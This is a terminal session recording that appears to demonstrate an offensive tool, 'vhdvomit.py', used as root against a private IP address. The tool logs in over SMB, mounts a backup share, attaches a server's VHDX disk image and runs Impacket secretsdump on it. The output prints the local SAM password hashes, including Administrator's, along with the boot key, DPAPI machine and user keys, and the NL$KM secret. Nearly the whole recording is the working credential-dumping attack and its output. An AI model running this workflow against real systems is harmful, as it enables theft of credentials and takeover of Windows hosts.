{"version": 2, "width": 125, "height": 32, "timestamp": 1759758486, "env": {"SHELL": "/usr/bin/zsh", "TERM": "tmux-256color"}}
[0.027123, "o", "                                                                                                                             \r\r"]
[0.035238, "o", "\r\u001b[0m\u001b[27m\u001b[24m\u001b[J\u001b[34m┌──(\u001b[1m\u001b[34m\u001b[31mroot㉿DESKTOP-MM\u001b[0m\u001b[31m\u001b[34m)-[\u001b[1m\u001b[34m\u001b[39m/home/matt/tools/vhdvomit\u001b[0m\u001b[34m]\r\n└─\u001b[1m\u001b[34m\u001b[31m#\u001b[0m\u001b[31m\u001b[39m \u001b[K\u001b[?1h\u001b=\u001b[?2004h"]
[1.217908, "o", "sudo python3 vhdvomit.py -t 192.168.116.86 -u matt -d HACKERMAN"]
[1.223533, "o", "\u001b[63D\u001b[4m\u001b[32ms\u001b[4m\u001b[32mu\u001b[4m\u001b[32md\u001b[4m\u001b[32mo\u001b[24m\u001b[39m \u001b[36mp\u001b[36my\u001b[36mt\u001b[36mh\u001b[36mo\u001b[36mn\u001b[36m3\u001b[39m \u001b[1mv\u001b[1mh\u001b[1md\u001b[1mv\u001b[1mo\u001b[1mm\u001b[1mi\u001b[1mt\u001b[1m.\u001b[1mp\u001b[1my\u001b[0m \u001b[32m-\u001b[32mt\u001b[39m\u001b[16C\u001b[32m-\u001b[32mu\u001b[39m\u001b[6C\u001b[32m-\u001b[32md\u001b[39m\u001b[10C"]
[1.81898, "o", "\u001b[?1l\u001b>"]
[1.819187, "o", "\u001b[?2004l"]
[1.825086, "o", "\r\r\n"]
[1.926831, "o", "[?] Password: "]
[4.982004, "o", "\r\n[*] Connecting to 192.168.116.86 with HACKERMAN\\matt...\r\n"]
[5.211069, "o", "\r\n[*] Available shares:\r\n  [1] BackupDrive\r\n  [2] C$\r\n  [3] D$\r\n  [4] E$\r\n  [a] All shares\r\n\r\n[?] Select shares (1,2,3 or 'a'): "]
[6.496002, "o", "1"]
[6.668712, "o", "\r\n"]
[6.785353, "o", "[+] Mounted BackupDrive at /mnt/BackupDrive\r\n[*] Scanning /mnt/BackupDrive for VHD/VHDX files...\r\n"]
[6.948372, "o", "  [+] Found: 497551dd-0000-0000-0000-100000000000.vhdx (0.04GB)\r\n  [+] Found: 497551dd-0000-0000-0000-c0d50e000000.vhdx (0.54GB)\r\n  [+] Found: SVR01.vhdx (15.26GB)\r\n"]
[7.401653, "o", "\r\n[*] VHD/VHDX files found:\r\n  [1] 497551dd-0000-0000-0000-100000000000.vhdx (0.04GB)\r\n  [2] 497551dd-0000-0000-0000-c0d50e000000.vhdx (0.54GB)\r\n  [3] SVR01.vhdx (15.26GB)\r\n  [a] All\r\n  [n] None\r\n\r\n[?] Select VHD/VHDX files (1,2,3 or 'a'/'n'): "]
[8.477236, "o", "3"]
[8.813676, "o", "\r\n"]
[8.814071, "o", "[*] Processing: SVR01.vhdx\r\n"]
[9.105495, "o", "[+] Connected /dev/nbd0\r\n"]
[14.842323, "o", "[+] Mounted /dev/nbd0p2\r\n"]
[14.948241, "o", "[+] SAM database found\r\n"]
[14.955219, "o", "[*] Running secretsdump -> SVR01_secretsdump.txt\r\n"]
[15.255513, "o", "Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies \r\n\r\n[*] Target system bootKey: 0x458c2a83412006cb660d340dcd87c533\r\n[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)\r\nAdministrator:500:aad3b435b51404eeaad3b435b51404ee:e19ccf75ee54e06b06a5907af13cef42:::\r\nGuest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::\r\nDefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::\r\nWDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:36df3bbad62cd1d80f54cb01d305a684:::\r\n[*] Dumping cached domain logon information (domain/username:hash)\r\n[*] Dumping LSA Secrets\r\n[*] DPAPI_SYSTEM \r\ndpapi_machinekey:0x3d36bd36144612932418ee55aac87f90ff0fd4c0\r\ndpapi_userkey:0xa28f2364becbce5260672e1a5cb04c757a008cc3\r\n[*] NL$KM \r\n 0000   9B 14 0C 91 60 1D B3 24  E6 84 1E 4F D7 C2 25 D3   ....`..$...O..%.\r\n 0010   B6 39 6B C9 76 4D 04 19  C4 90 10 C3 02 79 70 E6   .9k.vM.......yp.\r\n 0020   DE DB 7C B2 F7 56 AD 98  4C 19 1E EC 03 DD E0 C3   ..|..V..L.......\r\n 0030   E8 4D 76 C2 47 B8 A5 B8  C3 AD B8 38 0B 4D FE D9   .Mv.G......8.M..\r\nNL$KM:9b140c91601db324e6841e4fd7c225d3b6396bc9764d0419c49010c3027970e6dedb7cb2f756ad984c191eec03dde0c3e84d76c247b8a5b8c3adb8380b4dfed9\r\n[*] Cleaning up... \r\n\r\n"]
[15.255892, "o", "[!] Errors: /root/.local/share/pipx/venvs/impacket/lib/python3.13/site-packages/impacket/version.py:12: UserWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html. The pkg_resources package is slated for removal as early as 2025-11-30. Refrain from using this package or pin to Setuptools<81.\r\n  import pkg_resources\r\n\r\n[+] Output saved to SVR01_secretsdump.txt\r\n"]
[15.260669, "o", "\r\n[+] Complete\r\n[*] Cleaning up...\r\n"]
[15.269951, "o", "[+] Unmounted /mnt/BackupDrive\r\n"]
[15.285349, "o", "                                                                                                                             \r\r\r\n"]
[15.291309, "o", "\r\u001b[0m\u001b[27m\u001b[24m\u001b[J\u001b[34m┌──(\u001b[1m\u001b[34m\u001b[31mroot㉿DESKTOP-MM\u001b[0m\u001b[31m\u001b[34m)-[\u001b[1m\u001b[34m\u001b[39m/home/matt/tools/vhdvomit\u001b[0m\u001b[34m]\r\n"]
[15.291389, "o", "└─\u001b[1m\u001b[34m\u001b[31m#\u001b[0m\u001b[31m\u001b[39m \u001b[K\u001b[?1h\u001b="]
[15.291474, "o", "\u001b[?2004h"]
[15.911349, "o", "e"]
[15.915422, "o", "\b\u001b[4me\u001b[24m"]
[16.13096, "o", "\b\u001b[4me\u001b[4mx\u001b[24m"]
[16.133712, "o", "\b\b\u001b[24m\u001b[36me\u001b[24m\u001b[36mx\u001b[39m"]
[16.28134, "o", "\b\b\u001b[36me\u001b[36mx\u001b[36mi\u001b[39m"]
[16.284903, "o", "\b\b\b\u001b[39m\u001b[4me\u001b[39m\u001b[4mx\u001b[39m\u001b[4mi\u001b[24m"]
[16.418297, "o", "\b\u001b[4mi\u001b[4mt\u001b[24m"]
[16.419867, "o", "\b\b\b\b\u001b[24m\u001b[36me\u001b[24m\u001b[36mx\u001b[24m\u001b[36mi\u001b[24m\u001b[36mt\u001b[39m"]
[17.192486, "o", "\u001b[?1l\u001b>"]
[17.19278, "o", "\u001b[?2004l"]
[17.194646, "o", "\r\r\n"]
